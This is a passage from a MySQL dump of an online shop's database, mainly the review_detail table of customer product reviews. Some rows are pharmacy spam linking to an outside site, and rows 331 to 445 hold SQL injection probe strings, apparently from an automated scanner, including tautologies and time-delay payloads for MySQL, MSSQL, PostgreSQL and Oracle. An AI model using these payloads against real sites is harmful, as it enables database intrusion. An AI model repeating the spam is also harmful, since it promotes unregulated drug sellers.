(1573, '2023-08-12 15:30:08', 1, 2063, 2),
(1574, '2023-08-12 15:30:15', 1, 2063, 2),
(1575, '2023-08-12 15:30:21', 1, 2063, 2),
(1576, '2023-08-12 15:30:24', 1, 2063, 2),
(1577, '2023-08-12 15:30:29', 1, 2063, 2),
(1578, '2023-08-12 15:30:35', 1, 2063, 2),
(1579, '2023-08-12 15:30:43', 1, 2063, 2),
(1580, '2023-08-12 15:30:52', 1, 2063, 2),
(1581, '2023-08-12 15:31:03', 1, 2063, 2),
(1582, '2023-08-12 15:31:15', 1, 2063, 2),
(1583, '2023-08-12 15:31:23', 1, 2063, 2),
(1584, '2023-08-12 15:31:29', 1, 2063, 2),
(1585, '2023-08-12 15:31:33', 1, 2063, 2),
(1586, '2023-08-12 15:31:39', 1, 2063, 2),
(1587, '2023-08-12 15:31:44', 1, 2063, 2),
(1588, '2023-08-12 15:31:48', 1, 2063, 2),
(1589, '2023-08-12 15:31:49', 1, 2063, 2),
(1590, '2023-08-12 15:31:51', 1, 2063, 2),
(1591, '2023-08-12 15:31:56', 1, 2063, 2),
(1592, '2023-08-12 15:32:03', 1, 2063, 2),
(1593, '2023-08-12 15:32:11', 1, 2063, 2),
(1594, '2023-08-12 15:33:39', 1, 2063, 2),
(1595, '2023-08-12 15:33:45', 1, 2063, 2),
(1596, '2023-08-12 15:33:51', 1, 2063, 2),
(1597, '2023-08-12 15:33:52', 1, 2063, 2),
(1598, '2023-08-12 15:33:54', 1, 2063, 2),
(1599, '2023-08-12 15:33:55', 1, 2063, 2),
(1600, '2023-08-12 15:33:56', 1, 2063, 2),
(1601, '2023-08-12 15:33:58', 1, 2063, 2),
(1602, '2023-08-12 15:34:03', 1, 2063, 2),
(1603, '2023-08-12 15:34:12', 1, 2063, 2),
(1604, '2023-08-12 15:34:18', 1, 2063, 2),
(1605, '2023-08-12 15:34:29', 1, 2063, 2),
(1606, '2023-08-12 15:34:36', 1, 2063, 2),
(1607, '2023-08-12 15:34:43', 1, 2063, 2),
(1608, '2023-08-12 15:34:51', 1, 2063, 2),
(1609, '2023-08-12 15:34:58', 1, 2063, 2),
(1610, '2023-08-12 15:35:04', 1, 2063, 2),
(1611, '2023-08-12 15:35:10', 1, 2063, 2),
(1612, '2023-08-12 15:35:12', 1, 2063, 2),
(1613, '2023-08-12 15:35:14', 1, 2063, 2),
(1614, '2023-08-12 15:35:17', 1, 2063, 2),
(1615, '2023-08-12 15:35:23', 1, 2063, 2),
(1616, '2023-08-12 15:35:30', 1, 2063, 2),
(1617, '2023-08-12 15:35:35', 1, 2063, 2),
(1618, '2023-08-12 15:35:38', 1, 2063, 2),
(1619, '2023-08-12 15:35:47', 1, 2063, 2),
(1620, '2023-08-12 15:35:49', 1, 2063, 2),
(1621, '2023-08-12 15:35:53', 1, 2063, 2),
(1622, '2023-08-12 15:35:59', 1, 2063, 2),
(1623, '2023-08-12 15:36:07', 1, 2063, 2),
(1624, '2023-08-12 15:36:12', 1, 2063, 2),
(1625, '2023-08-12 15:36:16', 1, 2063, 2),
(1626, '2023-08-12 15:36:20', 1, 2063, 2),
(1627, '2023-08-12 15:36:24', 1, 2063, 2),
(1628, '2023-08-12 15:36:34', 1, 2063, 2),
(1629, '2023-08-12 15:36:40', 1, 2063, 2),
(1630, '2023-08-12 15:36:47', 1, 2063, 2),
(1631, '2023-08-12 15:36:50', 1, 2063, 2),
(1632, '2023-08-12 15:36:58', 1, 2063, 2),
(1633, '2023-08-12 15:37:02', 1, 2063, 2),
(1634, '2023-08-12 15:37:05', 1, 2063, 2),
(1635, '2023-08-12 15:37:10', 1, 2063, 2),
(1636, '2023-08-12 15:37:15', 1, 2063, 2),
(1637, '2023-08-12 15:37:18', 1, 2063, 2),
(1638, '2023-08-12 15:37:21', 1, 2063, 2),
(1639, '2023-08-12 15:37:22', 1, 2063, 2),
(1640, '2023-08-12 15:37:27', 1, 2063, 2),
(1641, '2023-10-19 04:30:59', 1, 2061, 2),
(1642, '2023-10-19 04:32:10', 1, 2059, 2),
(1643, '2023-10-19 04:34:01', 1, 2058, 2),
(1644, '2024-01-03 14:55:25', 1, 2061, 2),
(1645, '2024-06-30 16:42:26', 1, 2061, 2);

-- --------------------------------------------------------

--
-- Table structure for table `review_detail`
--

CREATE TABLE `review_detail` (
  `detail_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Review detail ID',
  `review_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Review ID',
  `store_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Store ID',
  `title` varchar(255) NOT NULL COMMENT 'Title',
  `detail` text NOT NULL COMMENT 'Detail description',
  `nickname` varchar(128) NOT NULL COMMENT 'User nickname',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Review detail information';

--
-- Dumping data for table `review_detail`
--

INSERT INTO `review_detail` (`detail_id`, `review_id`, `store_id`, `title`, `detail`, `nickname`, `customer_id`) VALUES
(313, 313, 1, 'Pic is WAY different then the real thing', 'Pic is WAY different then the real thing! My mom wouldn\'t even wear these there so ugly! Can I give a 0 rating?', 'Garnett', NULL),
(314, 314, 1, 'Meh, I\'m not hating them, but I\'m not in', 'Meh, I\'m not hating them, but I\'m not in love. The eyelet part looks way different online and the elastic band felt really tight. They are pretty comfy other than that.', 'Eugena', NULL),
(315, 315, 1, 'I\'m a mom on the go and I love these sho', 'I\'m a mom on the go and I love these shoes! They\'re comfy, cute and easy to slip on. What more could you ask for?', 'Elina', NULL),
(316, 316, 1, 'Very Good', 'It is 100% EFECTIVE', 'Sajib', 10),
(317, 317, 1, 'Good', 'All is well', 'Sudip Dhali', NULL),
(318, 318, 1, 'Good', 'very good', 'Sudip Dhali', NULL),
(319, 319, 1, 'Good', 'jhngcbv', 'Sudip Dhali', NULL),
(320, 320, 1, 'test', 'test test', 'Russel', NULL),
(321, 321, 1, 'test', 'testtesttesttesttesttesttesttest', 'Russel', NULL),
(322, 322, 1, 'Good Product', 'This product is very helpful product ', 'Masum', 14),
(323, 323, 1, 'generic viagra online pharmacy', 'canadian pharmacy drugs online  <a href=https://nienalo.strikingly.com/#>online pharmacies of canada </a> \r\npharmacy cheap no prescription  <a href=\"https://nienalo.strikingly.com/#\">canadian pharmaceuticals online </a> \r\nwalmart pharmacy viagra  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(324, 324, 1, 'navarro pharmacy', 'pharmacies online  <a href=https://nienalo.strikingly.com/#>online medicine tablets shopping </a> \r\nnational pharmacies online  <a href=\"https://nienalo.strikingly.com/#\">canada pharmaceuticals online </a> \r\nprescription drugs from canada  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(325, 325, 1, 'canadian drugstore', 'best online canadian pharmacy  <a href=https://nienalo.strikingly.com/#>pharmacy in canada </a> \r\ncanadian pharmacy online  <a href=\"https://nienalo.strikingly.com/#\">canada pharmacies </a> \r\npharmacy on line  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(326, 326, 1, 'indian pharmacy', 'canadian drugs pharmacies online  <a href=https://nienalo.strikingly.com/#>medical pharmacy </a> \r\ndrugstore online shopping  <a href=\"https://nienalo.strikingly.com/#\">pharmacy online prescription </a> \r\npharmacy intern  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(327, 327, 1, 'canada online pharmacies', 'canadian drugstore  <a href=https://nienalo.strikingly.com/#>online order medicine </a> \r\npharmacy online  <a href=\"https://nienalo.strikingly.com/#\">pharmacy online </a> \r\napollo pharmacy online  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(328, 328, 1, 'canadian drugs online pharmacies', 'pharmacy online no prescription  <a href=https://nienalo.strikingly.com/#>online order medicine </a> \r\ncanadian pharmacies-247  <a href=\"https://nienalo.strikingly.com/#\">canadian pharmacies online </a> \r\non line pharmacy  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(329, 329, 1, 'national pharmacies online', 'canadian drugs online pharmacy  <a href=https://nienalo.strikingly.com/#>online order medicine </a> \r\nmedical pharmacies  <a href=\"https://nienalo.strikingly.com/#\">generic viagra online pharmacy </a> \r\ncanadian online pharmacies  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(330, 330, 1, 'generic viagra online', 'mexican border pharmacies  <a href=https://nienalo.strikingly.com/#>canada pharmacies </a> \r\npharmacy online cheap  <a href=\"https://nienalo.strikingly.com/#\">online pharmacy </a> \r\ncialis generic pharmacy online  https://nienalo.strikingly.com/', 'BobbyCycle', NULL),
(331, 331, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(332, 332, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(333, 333, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(334, 334, 1, 'Mr.', '-1 OR 2+595-595-1=0+0+0+1 -- ', 'CpjJwWHV', 75),
(335, 335, 1, 'Mr.', '-1 OR 2+504-504-1=0+0+0+1', 'CpjJwWHV', 75),
(336, 336, 1, 'Mr.', '-1\' OR 2+86-86-1=0+0+0+1 -- ', 'CpjJwWHV', 75),
(337, 337, 1, 'Mr.', '-1\' OR 2+744-744-1=0+0+0+1 or \'xNF3pIb4\'=\'', 'CpjJwWHV', 75),
(338, 338, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(339, 339, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(340, 340, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(341, 341, 1, 'Mr.', '-1\" OR 2+677-677-1=0+0+0+1 -- ', 'CpjJwWHV', 75),
(342, 342, 1, 'Mr.', '-1 OR 2+27-27-1=0+0+0+1 -- ', 'CpjJwWHV', 75),
(343, 343, 1, 'Mr.', '-1 OR 2+931-931-1=0+0+0+1', 'CpjJwWHV', 75),
(344, 344, 1, 'Mr.', '-1\' OR 2+724-724-1=0+0+0+1 -- ', 'CpjJwWHV', 75),
(345, 345, 1, 'Mr.', '-1\' OR 2+179-179-1=0+0+0+1 or \'lNlXrSem\'=\'', 'CpjJwWHV', 75),
(346, 346, 1, 'Mr.', 'if(now()=sysdate(),sleep(15),0)', 'CpjJwWHV', 75),
(347, 347, 1, 'Mr.', '-1\" OR 2+739-739-1=0+0+0+1 -- ', 'CpjJwWHV', 75),
(348, 348, 1, 'Mr.', 'if(now()=sysdate(),sleep(15),0)', 'CpjJwWHV', 75),
(349, 349, 1, 'Mr.', '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 'CpjJwWHV', 75),
(350, 350, 1, 'Mr.', '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 'CpjJwWHV', 75),
(351, 351, 1, 'Mr.', '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 'CpjJwWHV', 75),
(352, 352, 1, 'Mr.', '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 'CpjJwWHV', 75),
(353, 353, 1, 'Mr.', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 'CpjJwWHV', 75),
(354, 354, 1, 'Mr.', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 'CpjJwWHV', 75),
(355, 355, 1, 'Mr.', '-1; waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(356, 356, 1, 'Mr.', '-1; waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(357, 357, 1, 'Mr.', '-1); waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(358, 358, 1, 'Mr.', '-1); waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(359, 359, 1, 'Mr.', '1 waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(360, 360, 1, 'Mr.', '1 waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(361, 361, 1, 'Mr.', 'IUdXiKjM\'; waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(362, 362, 1, 'Mr.', 'j2PJux3b\'; waitfor delay \'0:0:15\' -- ', 'CpjJwWHV', 75),
(363, 363, 1, 'Mr.', '-5 OR 196=(SELECT 196 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(364, 364, 1, 'Mr.', '-5 OR 731=(SELECT 731 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(365, 365, 1, 'Mr.', '-5) OR 572=(SELECT 572 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(366, 366, 1, 'Mr.', '-5) OR 976=(SELECT 976 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(367, 367, 1, 'Mr.', '-1)) OR 920=(SELECT 920 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(368, 368, 1, 'Mr.', '-1)) OR 947=(SELECT 947 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(369, 369, 1, 'Mr.', 'Jq9tLkma\' OR 833=(SELECT 833 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(370, 370, 1, 'Mr.', 'Cr9yy47n\' OR 658=(SELECT 658 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(371, 371, 1, 'Mr.', 'KVXCZKgL\') OR 468=(SELECT 468 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(372, 372, 1, 'Mr.', 'aVcMjxKI\') OR 584=(SELECT 584 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(373, 373, 1, 'Mr.', '94EXO9tt\')) OR 409=(SELECT 409 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(374, 374, 1, 'Mr.', 'v5kNSRij\')) OR 609=(SELECT 609 FROM PG_SLEEP(15))--', 'CpjJwWHV', 75),
(375, 375, 1, 'Mr.', '555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)', 'CpjJwWHV', 75),
(376, 376, 1, 'Mr.', '555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)', 'CpjJwWHV', 75),
(377, 377, 1, 'Mr.', '555\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 'CpjJwWHV', 75),
(378, 378, 1, 'Mr.', '555\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 'CpjJwWHV', 75),
(379, 379, 1, 'Mr.', '1\'\"', 'CpjJwWHV', 75),
(380, 380, 1, 'Mr.', '1\0????%2527%2522', 'CpjJwWHV', 75),
(381, 381, 1, 'Mr.', '1\'\"', 'CpjJwWHV', 75),
(382, 382, 1, 'Mr.', '1\0????%2527%2522', 'CpjJwWHV', 75),
(383, 383, 1, 'Mr.', '@@fY5w5', 'CpjJwWHV', 75),
(384, 384, 1, 'Mr.', '@@m9b5J', 'CpjJwWHV', 75),
(385, 385, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(386, 386, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(387, 387, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(388, 388, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(389, 389, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(390, 390, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(391, 391, 1, 'Mr.', '555', '-1 OR 2+922-922-1=0+0+0+1 -- ', 75),
(392, 392, 1, 'Mr.', '555', '-1 OR 2+854-854-1=0+0+0+1', 75),
(393, 393, 1, 'Mr.', '555', '-1\' OR 2+840-840-1=0+0+0+1 -- ', 75),
(394, 394, 1, 'Mr.', '555', '-1\' OR 2+158-158-1=0+0+0+1 or \'9tRBGAaE\'=\'', 75),
(395, 395, 1, 'Mr.', '555', '-1\" OR 2+727-727-1=0+0+0+1 -- ', 75),
(396, 396, 1, 'Mr.', '555', 'if(now()=sysdate(),sleep(15),0)', 75),
(397, 397, 1, 'Mr.', '555', '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 75),
(398, 398, 1, 'Mr.', '555', '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 75),
(399, 399, 1, 'Mr.', '555', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 75),
(400, 400, 1, 'Mr.', '555', '1 waitfor delay \'0:0:15\' -- ', 75),
(401, 401, 1, 'Mr.', '555', 'BTDEXFbJ\'; waitfor delay \'0:0:15\' -- ', 75),
(402, 402, 1, 'Mr.', '555', 'ZImTKQJE\' OR 439=(SELECT 439 FROM PG_SLEEP(15))--', 75),
(403, 403, 1, 'Mr.', '555', 'VH3SRITx\') OR 151=(SELECT 151 FROM PG_SLEEP(15))--', 75),
(404, 404, 1, 'Mr.', '555', '5c73wciS\')) OR 698=(SELECT 698 FROM PG_SLEEP(15))--', 75),
(405, 405, 1, 'Mr.', '555', 'CpjJwWHV\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 75),
(406, 406, 1, 'Mr.', '555', '1\'\"', 75),
(407, 407, 1, 'Mr.', '555', '1\0????%2527%2522', 75),
(408, 408, 1, 'Mr.', '555', '@@DYpXb', 75),
(409, 409, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(410, 410, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(411, 411, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(412, 412, 1, 'Mr.', '555', '-1 OR 2+793-793-1=0+0+0+1 -- ', 75),
(413, 413, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(414, 414, 1, '-1 OR 2+832-832-1=0+0+0+1 -- ', '555', 'CpjJwWHV', 75),
(415, 415, 1, 'Mr.', '555', '-1 OR 2+790-790-1=0+0+0+1', 75),
(416, 416, 1, '-1 OR 2+524-524-1=0+0+0+1', '555', 'CpjJwWHV', 75),
(417, 417, 1, 'Mr.', '555', '-1\' OR 2+566-566-1=0+0+0+1 -- ', 75),
(418, 418, 1, '-1\' OR 2+412-412-1=0+0+0+1 -- ', '555', 'CpjJwWHV', 75),
(419, 419, 1, 'Mr.', '555', '-1\' OR 2+210-210-1=0+0+0+1 or \'VjCbj3sD\'=\'', 75),
(420, 420, 1, '-1\' OR 2+226-226-1=0+0+0+1 or \'0AksgCHc\'=\'', '555', 'CpjJwWHV', 75),
(421, 421, 1, '-1\" OR 2+867-867-1=0+0+0+1 -- ', '555', 'CpjJwWHV', 75),
(422, 422, 1, 'Mr.', '555', '-1\" OR 2+708-708-1=0+0+0+1 -- ', 75),
(423, 423, 1, 'Mr.', '555', 'if(now()=sysdate(),sleep(15),0)', 75),
(424, 424, 1, 'if(now()=sysdate(),sleep(15),0)', '555', 'CpjJwWHV', 75),
(425, 425, 1, 'Mr.', '555', '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 75),
(426, 426, 1, '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', '555', 'CpjJwWHV', 75),
(427, 427, 1, 'Mr.', '555', '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 75),
(428, 428, 1, '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', '555', 'CpjJwWHV', 75),
(429, 429, 1, 'Mr.', '555', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 75),
(430, 430, 1, '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', '555', 'CpjJwWHV', 75),
(431, 431, 1, '1 waitfor delay \'0:0:15\' -- ', '555', 'CpjJwWHV', 75),
(432, 432, 1, 'Mr.', '555', '1 waitfor delay \'0:0:15\' -- ', 75),
(433, 433, 1, 'KNlFYyVE\'; waitfor delay \'0:0:15\' -- ', '555', 'CpjJwWHV', 75),
(434, 434, 1, 'Mr.', '555', 'i1f04gNo\'; waitfor delay \'0:0:15\' -- ', 75),
(435, 435, 1, 'PU81QPko\' OR 179=(SELECT 179 FROM PG_SLEEP(15))--', '555', 'CpjJwWHV', 75),
(436, 436, 1, 'Mr.', '555', 'McpG0877\' OR 818=(SELECT 818 FROM PG_SLEEP(15))--', 75),
(437, 437, 1, 'XugbPnWs\') OR 707=(SELECT 707 FROM PG_SLEEP(15))--', '555', 'CpjJwWHV', 75),
(438, 438, 1, 'Mr.', '555', 'gfGBWxHr\') OR 853=(SELECT 853 FROM PG_SLEEP(15))--', 75),
(439, 439, 1, 'OKgiXQxE\')) OR 665=(SELECT 665 FROM PG_SLEEP(15))--', '555', 'CpjJwWHV', 75),
(440, 440, 1, 'Mr.\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', '555', 'CpjJwWHV', 75),
(441, 441, 1, '1\'\"', '555', 'CpjJwWHV', 75),
(442, 442, 1, 'Mr.', '555', 'fDmayniX\')) OR 895=(SELECT 895 FROM PG_SLEEP(15))--', 75),
(443, 443, 1, '1\0????%2527%2522', '555', 'CpjJwWHV', 75),
(444, 444, 1, '@@V9obM', '555', 'CpjJwWHV', 75),
(445, 445, 1, 'Mr.', '555', 'CpjJwWHV\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 75),
(446, 446, 1, 'Mr.', '555', '1\'\"', 75),
(447, 447, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(448, 448, 1, 'Mr.', '555', '1\0????%2527%2522', 75),
(449, 449, 1, 'Mr.', '555', '@@BFWmZ', 75),
(450, 450, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(451, 451, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(452, 452, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(453, 453, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(454, 454, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(455, 455, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(456, 456, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(457, 457, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(458, 458, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(459, 459, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(460, 460, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(461, 461, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(462, 462, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(463, 463, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(464, 464, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(465, 465, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(466, 466, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(467, 467, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(468, 468, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(469, 469, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(470, 470, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(471, 471, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(472, 472, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(473, 473, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(474, 474, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(475, 475, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(476, 476, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(477, 477, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(478, 478, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(479, 479, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(480, 480, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(481, 481, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(482, 482, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(483, 483, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(484, 484, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(485, 485, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(486, 486, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(487, 487, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(488, 488, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(489, 489, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(490, 490, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(491, 491, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(492, 492, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(493, 493, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(494, 494, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(495, 495, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(496, 496, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(497, 497, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(498, 498, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(499, 499, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(500, 500, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(501, 501, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(502, 502, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(503, 503, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(504, 504, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(505, 505, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(506, 506, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(507, 507, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(508, 508, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(509, 509, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(510, 510, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(511, 511, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(512, 512, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(513, 513, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(514, 514, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(515, 515, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(516, 516, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(517, 517, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(518, 518, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(519, 519, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(520, 520, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(521, 521, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(522, 522, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(523, 523, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(524, 524, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(525, 525, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(526, 526, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(527, 527, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(528, 528, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(529, 529, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(530, 530, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(531, 531, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(532, 532, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(533, 533, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(534, 534, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(535, 535, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(536, 536, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(537, 537, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(538, 538, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(539, 539, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(540, 540, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(541, 541, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(542, 542, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(543, 543, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(544, 544, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(545, 545, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(546, 546, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(547, 547, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(548, 548, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(549, 549, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(550, 550, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(551, 551, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(552, 552, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(553, 553, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(554, 554, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(555, 555, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(556, 556, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(557, 557, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(558, 558, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(559, 559, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(560, 560, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(561, 561, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(562, 562, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(563, 563, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(564, 564, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(565, 565, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(566, 566, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(567, 567, 1, 'Mr.', '555', 'CpjJwWHV', 75),
(568, 568, 1, 'Mr.', '555', 'CpjJwWHV', 75),
